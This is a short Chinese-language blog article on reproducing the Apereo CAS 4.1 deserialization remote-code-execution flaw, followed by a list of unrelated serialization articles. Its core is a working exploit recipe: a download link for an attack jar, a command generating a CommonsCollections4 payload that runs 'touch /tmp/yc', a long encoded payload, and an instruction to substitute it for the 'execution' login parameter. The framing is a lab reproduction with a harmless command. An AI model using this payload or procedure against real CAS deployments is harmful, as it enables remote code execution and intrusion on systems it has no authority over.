Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现

2023-11-09 12:12
文章标签 漏洞 序列化 复现 rce cas 4.1 apereo

本文主要是介绍Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

漏洞描述

Apereo CAS 是一个企业单点登录系统。CAS 尝试通过 Apache Commons Collections 库反序列化对象时存在问题,这导致了 RCE 漏洞。

漏洞复现及利用

工具下载

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

执行命令

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/yc"  

69576052-1e15-41e9-8779-1d75cac0fe3e_AAAAIgAAABBvrhv%2Bq3TScSkEIPXCL6eaAAAABmFlczEyOAvX3IUxcf4qwN0nzU0wGdAq1Pym2Q%2FR4lx1FzCNudvOiux09imSakD57fzWQZbR0Er1HHx4mZweItkuVcx0HRInEzKE%2BPiBU4gNJ2VOKN%2B3sp3%2BdSLTZH6urog9Bx6u2%2BlKaxd55RGMu0EEAHMGAsaoblAv1pY%2B5EdohWXcIGn0C6yWPtWY2b7lstXDYzLmtrh6NNZrRVSUCTk13DBRuw%2FqYW2FuwPSnQKGqPuuwMzdHCwlZ%2FGI8pQqOZJjo2hOreJXf9u4U9fPMbbUh%2BYfEknpMW9gFpsw2b06%2FBPsHxdVl6n5TNvFuN%2B9riZuHI2DX5tKABIsQ4y1oXAuEpxCKqji1UVGuS01NFc7EoTL89F8MrC8AHnUXmB4mpLmVW0KAy2BsraDYiQTF8D93Qdrt0cBSFrOxKju62JuXqrion1zQa%2FYM1xnc46pR9V91QAL7GxHfSsPc4h1yiO0TMhwswjUzwzHRD768472U78EL55MhpMyn02GdfBpEhXNLjdgLGxdPbm86w7b2vPnwRkADS48D0i0VtFpvEicEMFJQS0FMNyxLso1aCaUUPOQV85X9%2BLeNlz7Ev1hzaGaLoBmH8qdMuQAQYFbkOFoYjHsQACkAqIC4n1cQZGdRpEKrzdFVls2%2B1I79%2BOC4jhoEJx%2F%2F%2BAJsO8inOboeihqWNMPsIbhftPd8OJZLSO4d2h8giz43Gv84KYyriEIUViKmhvcRWOIFgog2%2FVw%2FjdE7csHEs5TtqxuT4ID279ojj7buRJjWp%2FymSgROITWO6LVI7Q2scg9na3p9S4dpX1KHNWf8B7ruKzX5njE2ieQktIDS8%2F%2BITFBR7%2BRnRyTkoI%2BKadj862yBaFduU10kesl%2FcmSYVOWFkdC%2B4dk%2FAKDDmbbom4AB3uYh%2FE7VQoN8N5PpivdEYdYFGgdxDVVoLsnJgWk9%2Fvrr6n9HJl7njUuUrDYn3iH29IYU%2FMrNzB%2FPJ3V131WOs%2B6TMNUrWtmn%2Fl1I6Eg7qTuwQf%2B5yQ%2BVBW157LgEmyIVfVHidNUNB5Y9DW1ShXwD7hsQ5TMVKcUJ2oozCeezMO6gKa0sLge9NYPbXJZMADyFrjS0yUM9hmBp4Jh2WuW03cKZ9iyOGywrvhYtqFHcPpcJhJaY6TrItYGJoJqgpW5fHYLMHgmO4c6jFxZ0Mxk6iwNZtDEFXdjgaJohES7hlCoduiUx%2FDmFNbNvnSEeBdkGis3xzz4X5u5OSsarUf5osUvuBjWHzF4Nt5bnzNPd6BRjt9R%2FAhIAnE3n1Zei67ksQaqLfgxwm3sX366ZPX%2BctIxXmK8GdhEeq5mg6PBN21KlryBaewT1U%2FNo7rRpLG39qZij1U9CtSZ1TcO96lWXtS1nFGKMWagkSNKS3NeZO%2Fx9ZR3jm%2FMepWl61S9QUsJN2g924wIVzFgrubj5qqRaIYoHIW7rQji5insBvMyaTxeaHRBwh00qRZklbADSvwiuxx4WSM%2FGvpj2XK8pK6i0FTGHqIMeilVoA6MbG3RCSojZ%2BLRxMXDGJgPpu9D0HIKTJ5sl1v6ot%2Fm%2F8xntzKHKKmmNcfhfZ9Q2wPzKsYTqw%2BN8j%2FmzuAU5iCYva5l2RuPADEKk4kD5C7c48k3t%2FUBbHt3t0sLhGRJ0MSU95gE6PC90TQMSIRj%2BlNCCeZpyLHy578H0eXYi6ZPVj%2FyFiOpgdP0hw52y79xfBFM9UxwJeVdspxM%2FDD2gZMt8CuqVoot9RvROV74nzgOmEJRVowM%2FIpLbxmpYXDxSX%2B4F6qAXnBd%2FBvUbKys3hYHoZp7tu7nN5HkSr4ayLZUWciOu0zp2UsOxkQsNCl%2FzN2IwjG17D%2FlVXPJDe6pVPa%2BKh6wpVeXVEj4YYr%2BhBDmFA4MF0aAQEa4J0YNRsIVMw9DClb1H5%2FbIfzuYAoCuxluTD8SZcLrLxWMIaDhlVML0v%2FICTJwIyPfOFTnmFlx7aNM6QbOKHOs

将execution替换为payload即可

 可以看到,命令已经执行成功

这篇关于Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/376009

相关文章

SpringSecurity整合redission序列化问题小结(最新整理)

SpringSecurity整合redission序列化问题小结(最新整理)

《SpringSecurity整合redission序列化问题小结(最新整理)》文章详解SpringSecurity整合Redisson时的序列化问题,指出需排除官方Jackson依赖,通过自定义反序... 目录1. 前言2. Redission配置2.1 RedissonProperties2.2 Red
阅读更多...
Java中JSON格式反序列化为Map且保证存取顺序一致的问题

Java中JSON格式反序列化为Map且保证存取顺序一致的问题

《Java中JSON格式反序列化为Map且保证存取顺序一致的问题》:本文主要介绍Java中JSON格式反序列化为Map且保证存取顺序一致的问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未... 目录背景问题解决方法总结背景做项目涉及两个微服务之间传数据时,需要提供方将Map类型的数据序列化为co
阅读更多...
RedisTemplate默认序列化方式显示中文乱码的解决

RedisTemplate默认序列化方式显示中文乱码的解决

《RedisTemplate默认序列化方式显示中文乱码的解决》本文主要介绍了SpringDataRedis默认使用JdkSerializationRedisSerializer导致数据乱码,文中通过示... 目录1. 问题原因2. 解决方案3. 配置类示例4. 配置说明5. 使用示例6. 验证存储结果7.
阅读更多...
Python中文件读取操作漏洞深度解析与防护指南

Python中文件读取操作漏洞深度解析与防护指南

《Python中文件读取操作漏洞深度解析与防护指南》在Web应用开发中,文件操作是最基础也最危险的功能之一,这篇文章将全面剖析Python环境中常见的文件读取漏洞类型,成因及防护方案,感兴趣的小伙伴可... 目录引言一、静态资源处理中的路径穿越漏洞1.1 典型漏洞场景1.2 os.path.join()的陷
阅读更多...
SpringBoot实现Kafka动态反序列化的完整代码

SpringBoot实现Kafka动态反序列化的完整代码

《SpringBoot实现Kafka动态反序列化的完整代码》在分布式系统中,Kafka作为高吞吐量的消息队列,常常需要处理来自不同主题(Topic)的异构数据,不同的业务场景可能要求对同一消费者组内的... 目录引言一、问题背景1.1 动态反序列化的需求1.2 常见问题二、动态反序列化的核心方案2.1 ht
阅读更多...
SpringBoot项目中Redis存储Session对象序列化处理

SpringBoot项目中Redis存储Session对象序列化处理

《SpringBoot项目中Redis存储Session对象序列化处理》在SpringBoot项目中使用Redis存储Session时,对象的序列化和反序列化是关键步骤,下面我们就来讲讲如何在Spri... 目录一、为什么需要序列化处理二、Spring Boot 集成 Redis 存储 Session2.1
阅读更多...
Java controller接口出入参时间序列化转换操作方法(两种)

Java controller接口出入参时间序列化转换操作方法(两种)

《Javacontroller接口出入参时间序列化转换操作方法(两种)》:本文主要介绍Javacontroller接口出入参时间序列化转换操作方法,本文给大家列举两种简单方法,感兴趣的朋友一起看... 目录方式一、使用注解方式二、统一配置场景:在controller编写的接口,在前后端交互过程中一般都会涉及
阅读更多...
C++如何通过Qt反射机制实现数据类序列化

C++如何通过Qt反射机制实现数据类序列化

《C++如何通过Qt反射机制实现数据类序列化》在C++工程中经常需要使用数据类,并对数据类进行存储、打印、调试等操作,所以本文就来聊聊C++如何通过Qt反射机制实现数据类序列化吧... 目录设计预期设计思路代码实现使用方法在 C++ 工程中经常需要使用数据类,并对数据类进行存储、打印、调试等操作。由于数据类
阅读更多...
如何配置Spring Boot中的Jackson序列化

如何配置Spring Boot中的Jackson序列化

《如何配置SpringBoot中的Jackson序列化》在开发基于SpringBoot的应用程序时,Jackson是默认的JSON序列化和反序列化工具,本文将详细介绍如何在SpringBoot中配置... 目录配置Spring Boot中的Jackson序列化1. 为什么需要自定义Jackson配置?2.
阅读更多...
Django序列化中SerializerMethodField的使用详解

Django序列化中SerializerMethodField的使用详解

《Django序列化中SerializerMethodField的使用详解》:本文主要介绍Django序列化中SerializerMethodField的使用,具有很好的参考价值,希望对大家有所帮... 目录SerializerMethodField的基本概念使用SerializerMethodField的
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2